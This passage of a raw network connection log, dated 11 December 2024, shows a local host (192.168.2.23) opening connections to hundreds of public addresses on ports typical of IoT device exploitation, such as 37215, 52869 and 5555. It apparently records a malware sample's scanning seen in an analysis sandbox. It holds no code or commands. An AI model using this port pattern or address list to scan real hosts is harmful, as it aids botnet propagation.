                                                              Dec 11, 2024 00:43:07.685286999 CET4948280192.168.2.23185.7.165.100
                                                              Dec 11, 2024 00:43:07.685319901 CET4037280192.168.2.2381.139.38.234
                                                              Dec 11, 2024 00:43:07.685324907 CET3699680192.168.2.2327.220.140.158
                                                              Dec 11, 2024 00:43:07.685447931 CET8053412118.186.226.119192.168.2.23
                                                              Dec 11, 2024 00:43:07.685456991 CET3721557580216.234.214.243192.168.2.23
                                                              Dec 11, 2024 00:43:07.685466051 CET805879851.82.89.206192.168.2.23
                                                              Dec 11, 2024 00:43:07.685473919 CET805152250.156.95.160192.168.2.23
                                                              Dec 11, 2024 00:43:07.685482979 CET4915254212157.99.17.233192.168.2.23
                                                              Dec 11, 2024 00:43:07.685491085 CET814331085.151.170.165192.168.2.23
                                                              Dec 11, 2024 00:43:07.685492992 CET5341280192.168.2.23118.186.226.119
                                                              Dec 11, 2024 00:43:07.685498953 CET808045352158.249.180.11192.168.2.23
                                                              Dec 11, 2024 00:43:07.685501099 CET5879880192.168.2.2351.82.89.206
                                                              Dec 11, 2024 00:43:07.685507059 CET805452875.150.132.183192.168.2.23
                                                              Dec 11, 2024 00:43:07.685508013 CET5152280192.168.2.2350.156.95.160
                                                              Dec 11, 2024 00:43:07.685514927 CET5286934030153.223.215.107192.168.2.23
                                                              Dec 11, 2024 00:43:07.685522079 CET4331081192.168.2.2385.151.170.165
                                                              Dec 11, 2024 00:43:07.685528994 CET8058272110.93.67.47192.168.2.23
                                                              Dec 11, 2024 00:43:07.685530901 CET5758037215192.168.2.23216.234.214.243
                                                              Dec 11, 2024 00:43:07.685534000 CET5421249152192.168.2.23157.99.17.233
                                                              Dec 11, 2024 00:43:07.685537100 CET453528080192.168.2.23158.249.180.11
                                                              Dec 11, 2024 00:43:07.685539007 CET528694035024.139.219.73192.168.2.23
                                                              Dec 11, 2024 00:43:07.685542107 CET5452880192.168.2.2375.150.132.183
                                                              Dec 11, 2024 00:43:07.685547113 CET757447940108.101.101.73192.168.2.23
                                                              Dec 11, 2024 00:43:07.685549021 CET3403052869192.168.2.23153.223.215.107
                                                              Dec 11, 2024 00:43:07.685554981 CET80805652831.78.106.128192.168.2.23
                                                              Dec 11, 2024 00:43:07.685563087 CET844355052100.145.48.147192.168.2.23
                                                              Dec 11, 2024 00:43:07.685569048 CET4035052869192.168.2.2324.139.219.73
                                                              Dec 11, 2024 00:43:07.685570002 CET5827280192.168.2.23110.93.67.47
                                                              Dec 11, 2024 00:43:07.685573101 CET8054490172.27.14.53192.168.2.23
                                                              Dec 11, 2024 00:43:07.685581923 CET803933037.106.97.86192.168.2.23
                                                              Dec 11, 2024 00:43:07.685587883 CET565288080192.168.2.2331.78.106.128
                                                              Dec 11, 2024 00:43:07.685590029 CET8055226106.200.247.40192.168.2.23
                                                              Dec 11, 2024 00:43:07.685590029 CET479407574192.168.2.23108.101.101.73
                                                              Dec 11, 2024 00:43:07.685597897 CET80803678881.14.183.229192.168.2.23
                                                              Dec 11, 2024 00:43:07.685599089 CET550528443192.168.2.23100.145.48.147
                                                              Dec 11, 2024 00:43:07.685610056 CET5449080192.168.2.23172.27.14.53
                                                              Dec 11, 2024 00:43:07.685611963 CET3933080192.168.2.2337.106.97.86
                                                              Dec 11, 2024 00:43:07.685622931 CET5522680192.168.2.23106.200.247.40
                                                              Dec 11, 2024 00:43:07.685622931 CET367888080192.168.2.2381.14.183.229
                                                              Dec 11, 2024 00:43:07.711319923 CET557668080192.168.2.2327.155.160.77
                                                              Dec 11, 2024 00:43:07.711350918 CET561048080192.168.2.23216.87.48.175
                                                              Dec 11, 2024 00:43:07.711364985 CET531168080192.168.2.23105.183.55.212
                                                              Dec 11, 2024 00:43:07.711412907 CET3935837215192.168.2.23137.11.27.138
                                                              Dec 11, 2024 00:43:07.711412907 CET4371249152192.168.2.23220.37.202.8
                                                              Dec 11, 2024 00:43:07.711421967 CET399548080192.168.2.2376.56.4.87
                                                              Dec 11, 2024 00:43:07.711447954 CET3369680192.168.2.2312.57.50.133
                                                              Dec 11, 2024 00:43:07.711474895 CET5461449152192.168.2.236.130.70.88
                                                              Dec 11, 2024 00:43:07.711527109 CET4303637215192.168.2.2394.45.13.4
                                                              Dec 11, 2024 00:43:07.711527109 CET5286080192.168.2.2329.92.227.30
                                                              Dec 11, 2024 00:43:07.711915970 CET4408437215192.168.2.23174.243.22.77
                                                              Dec 11, 2024 00:43:07.711935997 CET5370280192.168.2.23120.95.235.71
                                                              Dec 11, 2024 00:43:07.711970091 CET561908080192.168.2.23199.246.29.37
                                                              Dec 11, 2024 00:43:07.711971045 CET392408080192.168.2.23210.227.250.180
                                                              Dec 11, 2024 00:43:07.712003946 CET502225555192.168.2.23189.118.208.52
                                                              Dec 11, 2024 00:43:07.712043047 CET4059437215192.168.2.2370.176.1.46
                                                              Dec 11, 2024 00:43:07.712073088 CET3644680192.168.2.2376.236.187.62
                                                              Dec 11, 2024 00:43:07.712074041 CET460488080192.168.2.23206.101.86.38
                                                              Dec 11, 2024 00:43:07.712095976 CET3615280192.168.2.23175.33.232.251
                                                              Dec 11, 2024 00:43:07.712130070 CET435228443192.168.2.2353.240.59.231
                                                              Dec 11, 2024 00:43:07.712136984 CET436948080192.168.2.23155.188.212.116
                                                              Dec 11, 2024 00:43:07.712160110 CET3438637215192.168.2.2319.62.64.141
                                                              Dec 11, 2024 00:43:07.712183952 CET4662680192.168.2.2388.168.89.213
                                                              Dec 11, 2024 00:43:07.712201118 CET6061680192.168.2.23204.174.148.48
                                                              Dec 11, 2024 00:43:07.712215900 CET3466080192.168.2.23175.193.203.48
                                                              Dec 11, 2024 00:43:07.712270975 CET3598249152192.168.2.23153.158.173.169
                                                              Dec 11, 2024 00:43:07.712292910 CET4487849152192.168.2.2347.227.87.189
                                                              Dec 11, 2024 00:43:07.712315083 CET3749880192.168.2.2350.241.123.12
                                                              Dec 11, 2024 00:43:07.712337017 CET571888080192.168.2.2390.16.121.147
                                                              Dec 11, 2024 00:43:07.712376118 CET3439849152192.168.2.23222.180.230.186
                                                              Dec 11, 2024 00:43:07.712394953 CET432645555192.168.2.23217.185.174.89
                                                              Dec 11, 2024 00:43:07.712444067 CET5964480192.168.2.23131.224.165.201
                                                              Dec 11, 2024 00:43:07.712444067 CET5770280192.168.2.23207.208.138.25
                                                              Dec 11, 2024 00:43:07.712481976 CET449028080192.168.2.2338.94.214.104
                                                              Dec 11, 2024 00:43:07.712486029 CET5301652869192.168.2.2347.219.98.220
                                                              Dec 11, 2024 00:43:07.712498903 CET484725555192.168.2.2372.196.245.40
                                                              Dec 11, 2024 00:43:07.712898970 CET5953080192.168.2.23129.247.169.177
                                                              Dec 11, 2024 00:43:07.712903976 CET4707052869192.168.2.2330.145.58.15
                                                              Dec 11, 2024 00:43:07.712929010 CET4646052869192.168.2.23131.244.225.102
                                                              Dec 11, 2024 00:43:07.712938070 CET4796680192.168.2.23189.212.174.222
                                                              Dec 11, 2024 00:43:07.712974072 CET3528680192.168.2.2375.198.60.36
                                                              Dec 11, 2024 00:43:07.712976933 CET435707574192.168.2.23104.181.12.16
                                                              Dec 11, 2024 00:43:07.713007927 CET4161280192.168.2.2343.51.149.142
                                                              Dec 11, 2024 00:43:07.713021040 CET530708443192.168.2.23116.253.15.39
                                                              Dec 11, 2024 00:43:07.713049889 CET5822080192.168.2.2320.161.188.142
                                                              Dec 11, 2024 00:43:07.713051081 CET584788080192.168.2.23170.154.175.226
                                                              Dec 11, 2024 00:43:07.713458061 CET3328237215192.168.2.2379.53.40.110
                                                              Dec 11, 2024 00:43:07.713459969 CET563708443192.168.2.2359.20.84.73
                                                              Dec 11, 2024 00:43:07.713476896 CET4996680192.168.2.23138.136.138.165
                                                              Dec 11, 2024 00:43:07.713516951 CET4230280192.168.2.23204.118.69.75
                                                              Dec 11, 2024 00:43:07.713536024 CET5757680192.168.2.23141.74.31.86
                                                              Dec 11, 2024 00:43:07.713551998 CET3733280192.168.2.2364.90.223.116
                                                              Dec 11, 2024 00:43:07.713551998 CET384148080192.168.2.23102.243.141.168
                                                              Dec 11, 2024 00:43:07.713612080 CET5462249152192.168.2.2365.241.114.10
                                                              Dec 11, 2024 00:43:07.713613987 CET4380080192.168.2.2348.37.127.242
                                                              Dec 11, 2024 00:43:07.713618994 CET441828080192.168.2.2347.54.222.151
                                                              Dec 11, 2024 00:43:07.713679075 CET5449880192.168.2.2384.44.230.193
                                                              Dec 11, 2024 00:43:07.713686943 CET381268080192.168.2.23113.43.66.2
                                                              Dec 11, 2024 00:43:07.713707924 CET4185480192.168.2.23185.3.109.165
                                                              Dec 11, 2024 00:43:07.713709116 CET565368443192.168.2.23216.226.126.11
                                                              Dec 11, 2024 00:43:07.713751078 CET3602281192.168.2.23129.13.37.109
                                                              Dec 11, 2024 00:43:07.713754892 CET4859049152192.168.2.2311.199.251.112
                                                              Dec 11, 2024 00:43:07.717782021 CET4031037215192.168.2.23112.161.2.88
                                                              Dec 11, 2024 00:43:07.717817068 CET6022080192.168.2.2384.227.113.193
                                                              Dec 11, 2024 00:43:07.717818975 CET4888280192.168.2.2393.215.216.106
                                                              Dec 11, 2024 00:43:07.717839003 CET551048443192.168.2.2345.126.212.86
                                                              Dec 11, 2024 00:43:07.717848063 CET330488080192.168.2.2348.117.193.34
                                                              Dec 11, 2024 00:43:07.717906952 CET371488080192.168.2.2393.127.201.166
                                                              Dec 11, 2024 00:43:07.717936993 CET5999452869192.168.2.23165.209.139.40
                                                              Dec 11, 2024 00:43:07.717936993 CET3397880192.168.2.2389.81.235.161
                                                              Dec 11, 2024 00:43:07.717937946 CET407288080192.168.2.2388.238.152.125
                                                              Dec 11, 2024 00:43:07.717946053 CET526888080192.168.2.23137.242.182.194
                                                              Dec 11, 2024 00:43:07.717978001 CET3887881192.168.2.2367.161.75.116
                                                              Dec 11, 2024 00:43:07.717998028 CET4048480192.168.2.23218.127.6.163
                                                              Dec 11, 2024 00:43:07.718009949 CET5855452869192.168.2.23160.49.80.179
                                                              Dec 11, 2024 00:43:07.718009949 CET429748443192.168.2.23137.20.185.147
                                                              Dec 11, 2024 00:43:07.718044043 CET596948080192.168.2.23192.19.241.79
                                                              Dec 11, 2024 00:43:07.718046904 CET3384080192.168.2.23197.215.52.31
                                                              Dec 11, 2024 00:43:07.718091011 CET4396437215192.168.2.23214.67.240.111
                                                              Dec 11, 2024 00:43:07.718092918 CET5883081192.168.2.2317.117.40.99
                                                              Dec 11, 2024 00:43:07.718143940 CET427628080192.168.2.23115.67.171.112
                                                              Dec 11, 2024 00:43:07.718143940 CET4150880192.168.2.2388.13.22.102
                                                              Dec 11, 2024 00:43:07.718190908 CET3867252869192.168.2.2319.99.0.75
                                                              Dec 11, 2024 00:43:07.718192101 CET5315249152192.168.2.2380.171.126.29
                                                              Dec 11, 2024 00:43:07.718216896 CET4390649152192.168.2.235.176.45.173
                                                              Dec 11, 2024 00:43:07.718242884 CET4716280192.168.2.2369.214.87.241
                                                              Dec 11, 2024 00:43:07.718261957 CET4791480192.168.2.2318.187.186.11
                                                              Dec 11, 2024 00:43:07.718310118 CET3346880192.168.2.23168.11.66.49
                                                              Dec 11, 2024 00:43:07.718310118 CET3427481192.168.2.23159.76.112.188
                                                              Dec 11, 2024 00:43:07.718341112 CET5067037215192.168.2.23150.84.103.83
                                                              Dec 11, 2024 00:43:07.718370914 CET3847080192.168.2.2394.38.108.174
                                                              Dec 11, 2024 00:43:07.718378067 CET474308080192.168.2.23185.132.62.107
                                                              Dec 11, 2024 00:43:07.718406916 CET5206852869192.168.2.2379.28.180.59
                                                              Dec 11, 2024 00:43:07.718408108 CET3880480192.168.2.23136.184.13.216
                                                              Dec 11, 2024 00:43:07.718414068 CET390308443192.168.2.23132.242.35.118
                                                              Dec 11, 2024 00:43:07.718455076 CET401188443192.168.2.2313.222.144.6
                                                              Dec 11, 2024 00:43:07.718456030 CET558265555192.168.2.23136.244.168.161
                                                              Dec 11, 2024 00:43:07.718498945 CET4896880192.168.2.23152.230.216.20
                                                              Dec 11, 2024 00:43:07.718498945 CET459448080192.168.2.23156.233.225.157
                                                              Dec 11, 2024 00:43:07.718514919 CET605468080192.168.2.23191.152.135.201
                                                              Dec 11, 2024 00:43:07.718544006 CET5808049152192.168.2.23221.50.187.178
                                                              Dec 11, 2024 00:43:07.718575001 CET430525555192.168.2.2397.218.108.192
                                                              Dec 11, 2024 00:43:07.718607903 CET522607574192.168.2.23141.228.135.142
                                                              Dec 11, 2024 00:43:07.718609095 CET353268443192.168.2.23109.1.35.229
                                                              Dec 11, 2024 00:43:07.718651056 CET5350481192.168.2.23177.23.125.155
                                                              Dec 11, 2024 00:43:07.718662024 CET4482880192.168.2.23102.75.189.134
                                                              Dec 11, 2024 00:43:07.718672037 CET602125555192.168.2.23102.183.168.190
                                                              Dec 11, 2024 00:43:07.718702078 CET4749081192.168.2.23198.204.234.167
                                                              Dec 11, 2024 00:43:07.718736887 CET597108080192.168.2.23176.129.63.174
                                                              Dec 11, 2024 00:43:07.718738079 CET446808443192.168.2.2386.223.164.204
                                                              Dec 11, 2024 00:43:07.718769073 CET4210480192.168.2.23195.103.106.246
                                                              Dec 11, 2024 00:43:07.718769073 CET478727574192.168.2.23157.65.160.237
                                                              Dec 11, 2024 00:43:07.718816996 CET5262680192.168.2.2317.113.247.169
                                                              Dec 11, 2024 00:43:07.718817949 CET349928080192.168.2.2313.5.228.68
                                                              Dec 11, 2024 00:43:07.718842983 CET3301081192.168.2.23122.111.230.144
                                                              Dec 11, 2024 00:43:07.718872070 CET3462449152192.168.2.23218.216.106.153
                                                              Dec 11, 2024 00:43:07.718900919 CET576368080192.168.2.2319.148.27.162
                                                              Dec 11, 2024 00:43:07.718911886 CET4731881192.168.2.2382.92.160.32
                                                              Dec 11, 2024 00:43:07.718951941 CET5980480192.168.2.23121.37.63.175
                                                              Dec 11, 2024 00:43:07.718957901 CET377588080192.168.2.234.33.109.123
                                                              Dec 11, 2024 00:43:07.718991041 CET417428080192.168.2.23139.126.200.221
                                                              Dec 11, 2024 00:43:07.718996048 CET4914052869192.168.2.23182.225.227.232
                                                              Dec 11, 2024 00:43:07.719037056 CET3412452869192.168.2.23214.179.110.36
                                                              Dec 11, 2024 00:43:07.719037056 CET5344449152192.168.2.2361.219.168.25
                                                              Dec 11, 2024 00:43:07.719065905 CET4374437215192.168.2.23128.120.223.143
                                                              Dec 11, 2024 00:43:07.719094992 CET3726680192.168.2.23209.30.237.251
                                                              Dec 11, 2024 00:43:07.719098091 CET3379452869192.168.2.23145.241.115.127
                                                              Dec 11, 2024 00:43:07.719122887 CET4226880192.168.2.23161.243.235.240
                                                              Dec 11, 2024 00:43:07.719140053 CET367948080192.168.2.234.241.28.42
                                                              Dec 11, 2024 00:43:07.719177961 CET5930880192.168.2.23202.99.95.205
                                                              Dec 11, 2024 00:43:07.719188929 CET5786437215192.168.2.232.57.120.199
                                                              Dec 11, 2024 00:43:07.719245911 CET4407880192.168.2.2322.22.88.44
                                                              Dec 11, 2024 00:43:07.719247103 CET461088080192.168.2.23211.91.199.166
                                                              Dec 11, 2024 00:43:07.719260931 CET3832680192.168.2.23168.135.70.170
                                                              Dec 11, 2024 00:43:07.719260931 CET600488080192.168.2.23140.25.22.34
                                                              Dec 11, 2024 00:43:07.719352961 CET600228443192.168.2.23220.186.66.237
                                                              Dec 11, 2024 00:43:07.762537956 CET8048332172.201.78.230192.168.2.23
                                                              Dec 11, 2024 00:43:07.762559891 CET8041452190.79.230.37192.168.2.23
                                                              Dec 11, 2024 00:43:07.762595892 CET4833280192.168.2.23172.201.78.230
                                                              Dec 11, 2024 00:43:07.762600899 CET4145280192.168.2.23190.79.230.37
                                                              Dec 11, 2024 00:43:07.762749910 CET8037254103.127.156.92192.168.2.23
                                                              Dec 11, 2024 00:43:07.762768030 CET803448481.152.153.104192.168.2.23
                                                              Dec 11, 2024 00:43:07.762799978 CET3725480192.168.2.23103.127.156.92
                                                              Dec 11, 2024 00:43:07.762799978 CET3448480192.168.2.2381.152.153.104
                                                              Dec 11, 2024 00:43:07.762835026 CET372154832095.187.185.8192.168.2.23
                                                              Dec 11, 2024 00:43:07.762875080 CET4832037215192.168.2.2395.187.185.8
                                                              Dec 11, 2024 00:43:07.762893915 CET803763475.88.145.147192.168.2.23
                                                              Dec 11, 2024 00:43:07.762902975 CET555556468133.86.189.70192.168.2.23
                                                              Dec 11, 2024 00:43:07.762911081 CET808044310191.118.66.148192.168.2.23
                                                              Dec 11, 2024 00:43:07.762936115 CET808050746117.194.49.127192.168.2.23
                                                              Dec 11, 2024 00:43:07.762938023 CET564685555192.168.2.23133.86.189.70
                                                              Dec 11, 2024 00:43:07.762945890 CET443108080192.168.2.23191.118.66.148
                                                              Dec 11, 2024 00:43:07.762945890 CET3763480192.168.2.2375.88.145.147
                                                              Dec 11, 2024 00:43:07.762974977 CET507468080192.168.2.23117.194.49.127
                                                              Dec 11, 2024 00:43:07.768379927 CET804850687.186.17.243192.168.2.23
                                                              Dec 11, 2024 00:43:07.768399000 CET803351864.246.130.65192.168.2.23
                                                              Dec 11, 2024 00:43:07.768491030 CET8140432198.74.93.127192.168.2.23
                                                              Dec 11, 2024 00:43:07.768498898 CET528693564259.92.247.206192.168.2.23
                                                              Dec 11, 2024 00:43:07.768659115 CET808056766148.104.170.209192.168.2.23
                                                              Dec 11, 2024 00:43:07.768676043 CET80804085623.210.109.40192.168.2.23
                                                              Dec 11, 2024 00:43:07.768753052 CET3721555034169.30.77.109192.168.2.23
                                                              Dec 11, 2024 00:43:07.768760920 CET8048354162.154.175.138192.168.2.23
                                                              Dec 11, 2024 00:43:07.768920898 CET84434464887.32.48.189192.168.2.23
                                                              Dec 11, 2024 00:43:07.768938065 CET815367258.49.123.103192.168.2.23
                                                              Dec 11, 2024 00:43:07.768946886 CET528696089245.153.216.8192.168.2.23
                                                              Dec 11, 2024 00:43:07.768987894 CET808055552109.171.62.170192.168.2.23
                                                              Dec 11, 2024 00:43:07.769001007 CET804056253.197.184.64192.168.2.23
                                                              Dec 11, 2024 00:43:07.769149065 CET814450626.22.241.69192.168.2.23
                                                              Dec 11, 2024 00:43:07.769205093 CET8033368150.143.19.210192.168.2.23
                                                              Dec 11, 2024 00:43:07.769212008 CET808035442145.145.175.50192.168.2.23
                                                              Dec 11, 2024 00:43:07.769220114 CET555534732198.246.28.145192.168.2.23
                                                              Dec 11, 2024 00:43:07.769227982 CET844348460135.51.122.231192.168.2.23
                                                              Dec 11, 2024 00:43:07.769380093 CET8056000156.9.96.43192.168.2.23
                                                              Dec 11, 2024 00:43:07.769428968 CET8043934136.165.68.160192.168.2.23
                                                              Dec 11, 2024 00:43:07.769437075 CET372155081813.209.203.228192.168.2.23
                                                              Dec 11, 2024 00:43:07.769486904 CET844357210142.213.93.241192.168.2.23
                                                              Dec 11, 2024 00:43:07.769690990 CET808057392168.22.178.161192.168.2.23
                                                              Dec 11, 2024 00:43:07.769699097 CET80803783868.182.174.204192.168.2.23
                                                              Dec 11, 2024 00:43:07.769709110 CET844359820159.112.33.196192.168.2.23
                                                              Dec 11, 2024 00:43:07.769783974 CET808060202169.70.235.203192.168.2.23
                                                              Dec 11, 2024 00:43:07.769793034 CET80804148828.130.196.141192.168.2.23
                                                              Dec 11, 2024 00:43:07.769797087 CET84434510092.27.66.191192.168.2.23
                                                              Dec 11, 2024 00:43:07.769802094 CET528694221253.169.246.148192.168.2.23
                                                              Dec 11, 2024 00:43:07.769938946 CET808034504203.246.201.178192.168.2.23
                                                              Dec 11, 2024 00:43:07.769969940 CET8034416212.59.33.56192.168.2.23
                                                              Dec 11, 2024 00:43:07.769987106 CET808039800205.55.79.236192.168.2.23
                                                              Dec 11, 2024 00:43:07.770020008 CET80805380245.210.95.218192.168.2.23
                                                              Dec 11, 2024 00:43:07.770085096 CET757435700115.248.197.146192.168.2.23
                                                              Dec 11, 2024 00:43:07.770095110 CET4915258998222.31.51.54192.168.2.23
                                                              Dec 11, 2024 00:43:07.770184040 CET75743672860.31.41.49192.168.2.23
                                                              Dec 11, 2024 00:43:07.770236015 CET8037576221.127.103.77192.168.2.23
                                                              Dec 11, 2024 00:43:07.770245075 CET84433844871.132.127.112192.168.2.23
                                                              Dec 11, 2024 00:43:07.770370007 CET55555047849.122.11.82192.168.2.23
                                                              Dec 11, 2024 00:43:07.770436049 CET3721549424195.121.56.192192.168.2.23
                                                              Dec 11, 2024 00:43:07.770447969 CET8052460199.190.42.216192.168.2.23
                                                              Dec 11, 2024 00:43:07.770493031 CET3721539332196.110.129.112192.168.2.23
                                                              Dec 11, 2024 00:43:07.770509005 CET4915250158220.74.77.186192.168.2.23
                                                              Dec 11, 2024 00:43:07.770651102 CET8053262137.77.114.156192.168.2.23
                                                              Dec 11, 2024 00:43:07.770670891 CET8134198183.170.83.140192.168.2.23
                                                              Dec 11, 2024 00:43:07.770678997 CET80805295634.155.65.192192.168.2.23
                                                              Dec 11, 2024 00:43:07.770800114 CET80803540431.125.159.69192.168.2.23
                                                              Dec 11, 2024 00:43:07.770809889 CET8056244125.138.41.164192.168.2.23
                                                              Dec 11, 2024 00:43:07.770813942 CET8058762110.215.176.196192.168.2.23
                                                              Dec 11, 2024 00:43:07.770822048 CET844335798206.100.116.9192.168.2.23
                                                              Dec 11, 2024 00:43:07.770829916 CET3721533070216.243.102.141192.168.2.23
                                                              Dec 11, 2024 00:43:07.770833015 CET5286933420209.95.98.5192.168.2.23
                                                              Dec 11, 2024 00:43:07.770915985 CET52869454301.146.114.34192.168.2.23
                                                              Dec 11, 2024 00:43:07.770925045 CET5286947912107.123.240.5192.168.2.23
                                                              Dec 11, 2024 00:43:07.770932913 CET75745453648.84.204.236192.168.2.23
                                                              Dec 11, 2024 00:43:07.770942926 CET8149348221.168.65.137192.168.2.23
                                                              Dec 11, 2024 00:43:07.770958900 CET8046760103.136.18.241192.168.2.23
                                                              Dec 11, 2024 00:43:07.770968914 CET8056222154.183.15.240192.168.2.23
                                                              Dec 11, 2024 00:43:07.771141052 CET808040464174.191.244.5192.168.2.23
                                                              Dec 11, 2024 00:43:07.771197081 CET805318638.61.43.59192.168.2.23
                                                              Dec 11, 2024 00:43:07.771205902 CET804049048.76.49.73192.168.2.23
                                                              Dec 11, 2024 00:43:07.771218061 CET5286950832113.213.180.153192.168.2.23
                                                              Dec 11, 2024 00:43:07.771245003 CET5286959620104.228.111.14192.168.2.23
                                                              Dec 11, 2024 00:43:07.771281004 CET3721535664202.218.205.135192.168.2.23
                                                              Dec 11, 2024 00:43:07.771378040 CET75743539051.78.208.9192.168.2.23
                                                              Dec 11, 2024 00:43:07.771387100 CET84435977833.214.128.25192.168.2.23
                                                              Dec 11, 2024 00:43:07.771416903 CET555560738171.18.70.194192.168.2.23
                                                              Dec 11, 2024 00:43:07.771600962 CET8060010198.111.45.203192.168.2.23
                                                              Dec 11, 2024 00:43:07.771609068 CET805561475.28.78.167192.168.2.23
                                                              Dec 11, 2024 00:43:07.771620989 CET8145496129.156.24.205192.168.2.23
                                                              Dec 11, 2024 00:43:07.771629095 CET808053960117.138.201.233192.168.2.23
                                                              Dec 11, 2024 00:43:07.771725893 CET808038914179.129.124.12192.168.2.23
                                                              Dec 11, 2024 00:43:07.771733999 CET75744925421.58.30.238192.168.2.23
                                                              Dec 11, 2024 00:43:07.771744967 CET808046104167.95.195.48192.168.2.23
                                                              Dec 11, 2024 00:43:07.771753073 CET8034116174.193.104.217192.168.2.23
                                                              Dec 11, 2024 00:43:07.771756887 CET4915251516123.85.144.247192.168.2.23
                                                              Dec 11, 2024 00:43:07.771764040 CET808056064131.11.250.52192.168.2.23
                                                              Dec 11, 2024 00:43:07.771862984 CET55554378045.7.188.235192.168.2.23
                                                              Dec 11, 2024 00:43:07.771882057 CET808043882152.54.88.1192.168.2.23
                                                              Dec 11, 2024 00:43:07.771889925 CET8032868217.149.6.59192.168.2.23
                                                              Dec 11, 2024 00:43:07.771898985 CET80803581019.207.169.63192.168.2.23
                                                              Dec 11, 2024 00:43:07.771940947 CET372154276635.73.130.33192.168.2.23
                                                              Dec 11, 2024 00:43:07.772008896 CET4915246800116.50.214.170192.168.2.23
                                                              Dec 11, 2024 00:43:07.772032022 CET8053700129.114.47.187192.168.2.23
                                                              Dec 11, 2024 00:43:07.772042036 CET757452874115.176.251.133192.168.2.23
                                                              Dec 11, 2024 00:43:07.772209883 CET3721546072128.27.58.131192.168.2.23
                                                              Dec 11, 2024 00:43:07.772260904 CET808048000160.10.52.39192.168.2.23
                                                              Dec 11, 2024 00:43:07.772269011 CET805499234.251.227.117192.168.2.23
                                                              Dec 11, 2024 00:43:07.812520981 CET569568080192.168.2.2334.70.187.128
                                                              Dec 11, 2024 00:43:07.812536001 CET463567574192.168.2.2392.45.169.28
                                                              Dec 11, 2024 00:43:07.812555075 CET350808443192.168.2.2318.46.148.55
                                                              Dec 11, 2024 00:43:07.812577009 CET5603480192.168.2.23219.203.86.236
                                                              Dec 11, 2024 00:43:07.812602043 CET4574880192.168.2.23175.171.254.37
                                                              Dec 11, 2024 00:43:07.812632084 CET5387052869192.168.2.2389.35.238.39
                                                              Dec 11, 2024 00:43:07.812647104 CET3824052869192.168.2.2391.150.21.151
                                                              Dec 11, 2024 00:43:07.812664986 CET4916481192.168.2.23153.141.84.168
                                                              Dec 11, 2024 00:43:07.812690020 CET4098480192.168.2.23143.26.169.103
                                                              Dec 11, 2024 00:43:07.812719107 CET344108443192.168.2.2345.185.70.100
                                                              Dec 11, 2024 00:43:07.812738895 CET527628080192.168.2.23115.50.227.165
                                                              Dec 11, 2024 00:43:07.812761068 CET3633081192.168.2.2380.227.147.152
                                                              Dec 11, 2024 00:43:07.812781096 CET529568080192.168.2.2349.74.230.150
                                                              Dec 11, 2024 00:43:07.812800884 CET534227574192.168.2.2397.4.184.157
                                                              Dec 11, 2024 00:43:07.812834978 CET4028237215192.168.2.23171.80.249.252
                                                              Dec 11, 2024 00:43:07.812859058 CET4809880192.168.2.23123.107.138.33
                                                              Dec 11, 2024 00:43:07.812879086 CET561628080192.168.2.23204.148.72.50
                                                              Dec 11, 2024 00:43:07.812906981 CET4999849152192.168.2.23175.239.142.242
                                                              Dec 11, 2024 00:43:07.816545010 CET378228080192.168.2.23177.122.6.73
                                                              Dec 11, 2024 00:43:07.816564083 CET5529252869192.168.2.23188.206.66.2
                                                              Dec 11, 2024 00:43:07.816600084 CET3299837215192.168.2.23183.10.226.229
                                                              Dec 11, 2024 00:43:07.816610098 CET362548080192.168.2.23186.73.136.18
                                                              Dec 11, 2024 00:43:07.816639900 CET4948280192.168.2.23185.7.165.100
                                                              Dec 11, 2024 00:43:07.816700935 CET3699680192.168.2.2327.220.140.158
                                                              Dec 11, 2024 00:43:07.816721916 CET5341280192.168.2.23118.186.226.119
                                                              Dec 11, 2024 00:43:07.816725016 CET4037280192.168.2.2381.139.38.234
                                                              Dec 11, 2024 00:43:07.816762924 CET5758037215192.168.2.23216.234.214.243
                                                              Dec 11, 2024 00:43:07.816776991 CET5879880192.168.2.2351.82.89.206
                                                              Dec 11, 2024 00:43:07.816787958 CET5152280192.168.2.2350.156.95.160
                                                              Dec 11, 2024 00:43:07.816816092 CET5421249152192.168.2.23157.99.17.233
                                                              Dec 11, 2024 00:43:07.816850901 CET4331081192.168.2.2385.151.170.165
                                                              Dec 11, 2024 00:43:07.816862106 CET453528080192.168.2.23158.249.180.11
                                                              Dec 11, 2024 00:43:07.816886902 CET5452880192.168.2.2375.150.132.183
                                                              Dec 11, 2024 00:43:07.816915989 CET3403052869192.168.2.23153.223.215.107
                                                              Dec 11, 2024 00:43:07.816932917 CET5827280192.168.2.23110.93.67.47
                                                              Dec 11, 2024 00:43:07.816962004 CET4035052869192.168.2.2324.139.219.73
                                                              Dec 11, 2024 00:43:07.816977978 CET479407574192.168.2.23108.101.101.73
                                                              Dec 11, 2024 00:43:07.817003965 CET565288080192.168.2.2331.78.106.128
                                                              Dec 11, 2024 00:43:07.817019939 CET550528443192.168.2.23100.145.48.147
                                                              Dec 11, 2024 00:43:07.817207098 CET5449080192.168.2.23172.27.14.53
                                                              Dec 11, 2024 00:43:07.817222118 CET3933080192.168.2.2337.106.97.86
                                                              Dec 11, 2024 00:43:07.817249060 CET5522680192.168.2.23106.200.247.40
                                                              Dec 11, 2024 00:43:07.817277908 CET367888080192.168.2.2381.14.183.229
                                                              Dec 11, 2024 00:43:07.830601931 CET80805576627.155.160.77192.168.2.23
                                                              Dec 11, 2024 00:43:07.830629110 CET808056104216.87.48.175192.168.2.23
                                                              Dec 11, 2024 00:43:07.830640078 CET808053116105.183.55.212192.168.2.23
                                                              Dec 11, 2024 00:43:07.830725908 CET4915243712220.37.202.8192.168.2.23
                                                              Dec 11, 2024 00:43:07.830737114 CET3721539358137.11.27.138192.168.2.23
                                                              Dec 11, 2024 00:43:07.830904007 CET80803995476.56.4.87192.168.2.23
                                                              Dec 11, 2024 00:43:07.830935955 CET803369612.57.50.133192.168.2.23
                                                              Dec 11, 2024 00:43:07.830945015 CET49152546146.130.70.88192.168.2.23
                                                              Dec 11, 2024 00:43:07.831077099 CET372154303694.45.13.4192.168.2.23
                                                              Dec 11, 2024 00:43:07.831084967 CET805286029.92.227.30192.168.2.23
                                                              Dec 11, 2024 00:43:07.831124067 CET3721544084174.243.22.77192.168.2.23
                                                              Dec 11, 2024 00:43:07.831353903 CET8053702120.95.235.71192.168.2.23
                                                              Dec 11, 2024 00:43:07.831362009 CET808056190199.246.29.37192.168.2.23
                                                              Dec 11, 2024 00:43:07.831425905 CET808039240210.227.250.180192.168.2.23
                                                              Dec 11, 2024 00:43:07.831434011 CET555550222189.118.208.52192.168.2.23
